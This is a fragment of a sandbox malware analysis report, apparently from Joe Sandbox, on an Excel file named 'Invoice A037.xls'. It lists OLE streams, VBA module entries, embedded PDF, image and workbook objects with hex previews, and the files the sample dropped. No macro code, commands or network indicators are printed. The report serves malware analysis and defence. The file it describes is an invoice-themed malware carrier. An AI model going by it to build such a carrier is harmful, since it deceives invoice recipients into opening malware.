Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ a P . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 61 50 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ d . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 64 a6 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 8d cb 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 24 c8 0e ad 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2920681057018664
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . ! F K . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD00090641/\x1CompObj
CLSID:
File Type:	data
Stream Size:	94
Entropy:	4.345966460061678
Base64 Encoded:	False
Data ASCII:	. . . . . . e . . D E S T . . . . . . A c r o b a t D o c u m e n t . . . . . . . . . A c r o E x c h . D o c u m e n t . D C . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 65 ca 01 b8 fc a1 d0 11 85 ad 44 45 53 54 00 00 11 00 00 00 41 63 72 6f 62 61 74 20 44 6f 63 75 6d 65 6e 74 00 00 00 00 00 15 00 00 00 41 63 72 6f 45 78 63 68 2e 44 6f 63 75 6d 65 6e 74 2e 44 43 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090641/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090641/CONTENTS
CLSID:
File Type:	PDF document, version 1.3, 1 pages
Stream Size:	29526
Entropy:	7.810444862277873
Base64 Encoded:	True
Data ASCII:	% P D F - 1 . 3 . % . . 1 0 o b j . < < . / T y p e / P a g e . / M e d i a B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / C r o p B o x [ 0 0 6 1 1 . 2 8 7 9 0 . 9 2 ] . / P a r e n t 2 0 R . / R o t a t e 0 / R e s o u r c e s < < . / P r o c S e t [ / P D F / I m a g e C / I m a g e B / I m a g e I ] . / X O b j e c t < < . / O b j 3 3 0 R > > . > > . / C o n t e n t s [ 4 0 R ] . > > . e n d o b j . 3 0 o b j . < < / T y p e / X O b
Data Raw:	25 50 44 46 2d 31 2e 33 0d 25 e2 e3 cf d3 0d 0d 31 20 30 20 6f 62 6a 0a 3c 3c 0a 2f 54 79 70 65 20 2f 50 61 67 65 0a 2f 4d 65 64 69 61 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 43 72 6f 70 42 6f 78 20 5b 30 20 30 20 36 31 31 2e 32 38 20 37 39 30 2e 39 32 5d 0a 2f 50 61 72 65 6e 74 20 32 20 30 20 52 0a 2f 52 6f 74 61 74 65 20 30 20 2f 52 65 73 6f 75

General
Stream Path:	MBD00090642/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Invoice A037.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Dropped Files

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Phishing

Compliance

Spreading

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

LLM Input / Output

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Cache\data_1

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\LOG.old~RF560fca.TMP (copy)

C:\Users\user\AppData\LocalLow\Adobe\AcroCef\DC\Acrobat\Cache\Visited Links

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeCMapFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeFnt16.lst.3808

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\AdobeSysFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AcroFnt19.lst (copy)

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\Cache\AdobeFnt16.lst.3808

C:\Users\user\AppData\Local\Adobe\Acrobat\DC\IconCacheRdr65536.dat

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Windows Analysis Report
Invoice A037.xls

General
Stream Path:	MBD00090642/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

General
Stream Path:	MBD00090642/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	220
Entropy:	3.372234242231489
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \\ . . . . . . . h . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . % ? ` * C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 ac 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 5c 00 00 00 12 00 00 00 68 00 00 00 0b 00 00 00 80 00 00 00 0c 00 00 00 8c 00 00 00 0d 00 00 00 98 00 00 00 13 00 00 00 a4 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD00090642/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090642/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

General
Stream Path:	MBD00090642/MBD0018D4CE/Contents
CLSID:
File Type:	Corel Photo-Paint image, version 9, 716 x 547 RGB 24 bits, 11811024 micro dots/mm, 4 blocks, array offset 0x13c
Stream Size:	197671
Entropy:	6.989042939766534
Base64 Encoded:	True
Data ASCII:	C P T 9 F I L E . . . . . . . . . . . . . . . . 8 . 8 . . . . . . . . . . . . . . . . . . . . < . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	43 50 54 39 46 49 4c 45 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d0 38 b4 00 d0 38 b4 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 01 00 94 00 00 00 3c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090642/MBD0068D442/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090642/MBD0068D442/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	26243
Entropy:	7.635433729726103
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . & . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 a1 26 fd 83 92 01 00 00 ae 05 00 00 13 00 e0 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 dc 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090642/MBD007203CB/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD00090642/MBD007203CB/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	248
Entropy:	3.0523231150355867
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . P u r c h a s e O r d e r T e m p l a t e . . . . . . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c8 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a2 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	MBD00090642/MBD007203CB/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	256
Entropy:	4.086306928392587
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . $ . . . B r a t i s l a v M i l o j e v i c \| E L M E D d . o . o . . . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . N ; . . @ . . . . . . . @ . . . . v @ n ) C . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 d0 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 04 00 00 00 50 00 00 00 08 00 00 00 7c 00 00 00 12 00 00 00 8c 00 00 00 0b 00 00 00 a4 00 00 00 0c 00 00 00 b0 00 00 00 0d 00 00 00 bc 00 00 00 13 00 00 00 c8 00 00 00 02 00 00 00 e4 04 00 00